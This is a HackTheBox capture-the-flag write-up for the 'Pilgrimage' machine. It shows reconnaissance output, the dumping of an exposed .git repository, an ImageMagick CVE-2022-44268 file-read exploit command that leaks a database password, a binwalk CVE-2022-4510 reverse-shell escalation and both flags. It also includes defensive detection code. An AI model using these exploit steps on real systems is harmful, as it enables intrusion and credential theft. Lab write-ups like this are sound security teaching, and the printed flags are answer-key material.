
HTB - Pilgrimage

· 8 min read
Strider

Intro

Hi, after some time I'm writing another small write-up. Today it's about the CTF "Pilgrimage". This challenge can be found on the HackTheBox platform. You have to find 2 flags in this challenge.

Discovery

First of all I fire up nmap and run a port scan. As you can see below, nmap discovers 2 open ports.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-16 11:25 CEST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:25
Completed Parallel DNS resolution of 1 host. at 11:25, 0.00s elapsed
Initiating SYN Stealth Scan at 11:25
Scanning 10.129.71.227 [65535 ports]
Discovered open port 80/tcp on 10.129.71.227
Discovered open port 22/tcp on 10.129.71.227
SYN Stealth Scan Timing: About 23.78% done; ETC: 11:27 (0:01:39 remaining)
SYN Stealth Scan Timing: About 57.98% done; ETC: 11:28 (0:01:23 remaining)
SYN Stealth Scan Timing: About 68.69% done; ETC: 11:28 (0:01:06 remaining)
SYN Stealth Scan Timing: About 82.16% done; ETC: 11:28 (0:00:38 remaining)
Completed SYN Stealth Scan at 11:29, 224.37s elapsed (65535 total ports)
Initiating Service scan at 11:29
Scanning 2 services on 10.129.71.227
Completed Service scan at 11:29, 6.42s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.129.71.227
Initiating Traceroute at 11:29
Completed Traceroute at 11:29, 0.21s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:29
Completed Parallel DNS resolution of 2 hosts. at 11:29, 0.20s elapsed
NSE: Script scanning 10.129.71.227.
Initiating NSE at 11:29
Completed NSE at 11:29, 3.66s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.82s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Nmap scan report for 10.129.71.227
Host is up (0.12s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
| 256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_ 256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Uptime guess: 38.680 days (since Thu Sep 7 19:09:43 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 208.94 ms 10.10.14.1
2 208.75 ms 10.129.71.227

NSE: Script Post-scanning.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 238.05 seconds
Raw packets sent: 69272 (3.050MB) | Rcvd: 69657 (2.984MB)

The ports nmap discovers are port 22, which is SSH and which I leave as it is for now, and port 80, which is an HTTP server (nginx) and is the interesting one for now. So I have to look at the web application running on port 80.

Another interesting piece of information is the redirect to http://pilgrimage.htb/ on port 80. I added a host entry for that domain and the corresponding IP address to the file /etc/hosts.

dia1.png

The web application offers a file upload for images in order to shrink them. That sounds to me like I have to do some file upload exploitation. I fire up Burp Suite to test the file upload and run nikto at the same time.

While testing the file upload with Burp Suite I got the results from nikto, which look very interesting because there is a .git folder in the web root directory.

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.129.71.227
+ Target Hostname: pilgrimage.htb
+ Target Port: 80
+ Start Time: 2023-10-16 11:38:33 (GMT2)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Admin login page/section found.
+ /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7962 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-10-16 11:45:16 (GMT2) (403 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Initial access

The first thing I tried is to request the listed files of the .git directory with curl. And yes, it's a real git repository hosted on that server.

dia2.png

The next thing I tried is to download the whole .git directory with the wget tool.

wget -r --no-parent http://pilgrimage.htb/.git/

But this doesn't work, I got 403 Forbidden. I also tested whether I can download specific files from that directory, and yes, that works.

dia3.png

After some googling I found a tool called git-dumper. With this tool it should be possible to download the entire directory.

dia4.png

That looks pretty good, maybe I can find some credentials or some vulnerabilities in the source of that application.
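The point of this step is that the 403 on /.git/ only means directory listing is switched off; every file underneath is still served, which is all a dumper needs. Below is an added example (my own code, not the author's tooling and not git-dumper) that takes a set of HTTP responses for the usual .git artefacts and reports what each readable file gives away: the checked-out ref from HEAD, remote URLs from config, and the tracked-path count from the index header. The responses are constructed here so the script runs offline; the hostnames and counts in them are invented.

```python
import configparser
import struct

# Constructed sample responses standing in for GET /.git/<file> against a web
# root that exposes its repository (these are not captures from the box).
SAMPLE_RESPONSES = {
    "/.git/": (403, b"<html>403 Forbidden</html>"),
    "/.git/HEAD": (200, b"ref: refs/heads/master\n"),
    "/.git/config": (200, b"[core]\n\trepositoryformatversion = 0\n\tbare = false\n"
                           b"[remote \"origin\"]\n\turl = git@example.invalid:org/app.git\n"),
    # a real index continues with 62-byte entries; the 12-byte header is enough here
    "/.git/index": (200, b"DIRC" + struct.pack(">II", 2, 7) + b"\x00" * 100),
}


def analyse_git_exposure(responses):
    """Return findings describing what an exposed .git directory reveals.

    responses maps a request path to (status_code, body_bytes). A 403 on the
    bare directory only means autoindex is off; the individual files decide."""
    findings = []

    status, body = responses.get("/.git/HEAD", (None, b""))
    if status == 200 and body.startswith(b"ref: "):
        branch = body[len(b"ref: "):].strip().decode("utf-8", "replace")
        findings.append("HEAD readable, checked-out ref " + branch)

    status, body = responses.get("/.git/config", (None, b""))
    if status == 200:
        cfg = configparser.ConfigParser()
        # git indents keys with a tab; strip it so configparser sees plain keys
        text = "\n".join(line.strip() for line in body.decode("utf-8", "replace").splitlines())
        cfg.read_string(text)
        if cfg.has_section("core"):
            findings.append("config readable, bare=" + cfg.get("core", "bare", fallback="?"))
        for section in cfg.sections():
            if section.startswith("remote ") and cfg.has_option(section, "url"):
                findings.append("config leaks remote url " + cfg.get(section, "url"))

    status, body = responses.get("/.git/index", (None, b""))
    if status == 200 and len(body) >= 12 and body[:4] == b"DIRC":
        version, entries = struct.unpack(">II", body[4:12])
        findings.append(f"index readable, version {version}, {entries} tracked paths")

    return findings


def is_exposed(responses):
    """True when any .git artefact could be read: treat it as a full source leak."""
    return bool(analyse_git_exposure(responses))


if __name__ == "__main__":
    for finding in analyse_git_exposure(SAMPLE_RESPONSES):
        print(finding)
```

On the defensive side the fix is not to ship the .git directory with the web root at all; where that cannot be guaranteed, an nginx rule such as `location ~ /\.git { deny all; }` blocks the individual files, not just the listing.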

But for now I took a break and continued later.

dia5.png

Well, the git commit history shows me that only one commit was made. In the folder source, where I downloaded the whole git repository to, I have the source files where I can start analyzing.

dia6.png

By analyzing the source file index.php I found 2 interesting things: the first one is the sqlite database sqlite:/var/db/pilgrimage, and the second is the exec function which executes the magick binary. Well, magick is a program to convert image files, and at first glance it looks somewhat like a command injection vulnerability.

./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

After some research on magick 7.1.0-49, I stumbled over CVE-2022-44268 (ImageMagick 7.1.0-49 - Arbitrary File Read). That sounds very good to me. This vulnerability could be useful to dump the database. I decided to use this PoC exploit to get the database.

python3 CVE-2022-44268.py --image ../test.jpg --file-to-read /var/db/pilgrimage --output poisoned.jpg

I uploaded this generated image file to dump the database.

dia7.png

dia8.png

The next thing I have to do is run this exploit script against the generated URL from the upload page. Unfortunately it didn't work very well.

dia9.png

I analyzed the exploit code, commented out the decoder line and replaced the print call.

dia10.png

Now it's time to run it again, and I hope it works properly.

dia11.png

Well, it looks good; time to dump it to a file and decode it as a raw sqlite file. To achieve this I crafted this command, which dumps the database, decodes the hex output to raw bytes and writes them into the test.db file.

python3 CVE-2022-44268.py --url http://pilgrimage.htb/shrunk/652d0c760e47c.png | xxd -r -p - > ../test.db 
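What the xxd step above is undoing is worth seeing in code. The leaked data comes back inside the shrunk PNG as an ancillary text chunk: ImageMagick stores embedded profiles in a tEXt chunk whose keyword is "Raw profile type <name>" and whose text is an empty line, the profile name, its byte length and then the bytes as hex lines. The following is an added example (my own code, not the PoC the author used and not part of ImageMagick) that parses PNG chunks with CRC checking, decodes any raw-profile chunk the way `xxd -r -p` does, and rebuilds the file without textual chunks, which is the sanitising step an upload handler should apply before calling an image converter. The sample PNG and the secret it carries are constructed in the script; the exact raw-profile layout is my reading of ImageMagick's PNG coder and is an assumption of the demo.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = (b"tEXt", b"zTXt", b"iTXt")


def build_chunk(ctype, payload):
    """Assemble one PNG chunk: length, type, payload, CRC over type+payload."""
    crc = zlib.crc32(ctype + payload)
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def iter_chunks(data):
    """Yield (type, payload) for every chunk, verifying each CRC on the way."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) != crc:
            raise ValueError("CRC mismatch in %r chunk" % ctype)
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def decode_raw_profile(text):
    """Decode a 'Raw profile type' text: empty first line, profile name, byte
    length, then hex lines. Joining the hex lines and decoding them is exactly
    what `xxd -r -p` did in the write-up's pipeline."""
    lines = text.split("\n")
    name, declared = lines[1].strip(), int(lines[2].strip())
    raw = bytes.fromhex("".join(lines[3:]))
    if len(raw) != declared:
        raise ValueError("profile length mismatch")
    return name, raw


def scan_png(data):
    """Return (keywords, leaked): the keyword of every textual chunk, and the
    decoded bytes of every raw-profile chunk keyed by profile name."""
    keywords, leaked = [], {}
    for ctype, payload in iter_chunks(data):
        if ctype not in TEXT_CHUNKS:
            continue
        keyword, _, rest = payload.partition(b"\x00")
        keywords.append(keyword.decode("latin-1"))
        if ctype == b"zTXt":
            rest = zlib.decompress(rest[1:])  # first byte is the compression method
        if ctype != b"iTXt" and keyword.startswith(b"Raw profile type"):
            name, raw = decode_raw_profile(rest.decode("latin-1"))
            leaked[name] = raw
    return keywords, leaked


def strip_text_chunks(data):
    """Rebuild the PNG without textual chunks: metadata an image-shrinking
    service has no reason to pass on to its converter."""
    out = PNG_SIG
    for ctype, payload in iter_chunks(data):
        if ctype not in TEXT_CHUNKS:
            out += build_chunk(ctype, payload)
    return out


# Constructed secret standing in for a file the server was made to read.
SAMPLE_SECRET = b"alice:x:1000:1000::/home/alice:/bin/bash\n"


def make_sample_png(secret):
    """Constructed 1x1 grayscale PNG carrying a raw-profile chunk laid out the
    way ImageMagick emits one (assumed layout, built here for the demo)."""
    ihdr = build_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    idat = build_chunk(b"IDAT", zlib.compress(b"\x00\x00"))  # filter byte + one pixel
    hexdump = secret.hex()
    hex_lines = "\n".join(hexdump[i:i + 72] for i in range(0, len(hexdump), 72))
    text = "\nexample\n%8d\n%s\n" % (len(secret), hex_lines)
    profile = build_chunk(b"tEXt", b"Raw profile type example\x00" + text.encode("latin-1"))
    return PNG_SIG + ihdr + profile + idat + build_chunk(b"IEND", b"")


if __name__ == "__main__":
    png = make_sample_png(SAMPLE_SECRET)
    print(scan_png(png))
    print(scan_png(strip_text_chunks(png)))
```

Running scan_png over the images a conversion service writes out is a cheap way to notice that file contents are leaving through image metadata; stripping the textual chunks on the way in, together with an ImageMagick release that has the fix, is the mitigation.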

dia12.png

Well, it works and I can try to read all credentials stored in the users table.

dia13.png

emily|abigchonkyboi123

I quickly tested these credentials on SSH to see whether I get access. Yes, it worked, I'm now connected via SSH and have a shell.

dia14.png

Here you go! Here is the first flag.

user.txt: 4db5e8f1234f11678197e8dbbf176dbe

Get root

dia15.png

While enumerating potential attack vectors for privilege escalation, I stumbled in the process list over the malicious script /usr/bin/malwarescan.sh.

dia16.png

I analyzed the source and my attention was drawn to binwalk.

dia17.png

I searched for binwalk v2.3.2 to see whether there are any vulnerabilities which I could exploit to gain root access, and yes, there is one: CVE-2022-4510.

dia18.png

To exploit this vulnerability I used a PoC and generated an exploit image which spawns a reverse shell to my local machine.

dia19.png

The only thing I have to do, if I understand it correctly, is to upload the image file and switch over to the netcat listener.

dia20.png

The netcat listener received the shell and I'm root, noice! Grab the root flag, which completes this challenge.

root.txt: 639e2c725229eebabac8c01dc5da6ab2

This challenge was fun and it was an easy machine 😄

I hope you enjoyed it and see you next time 😄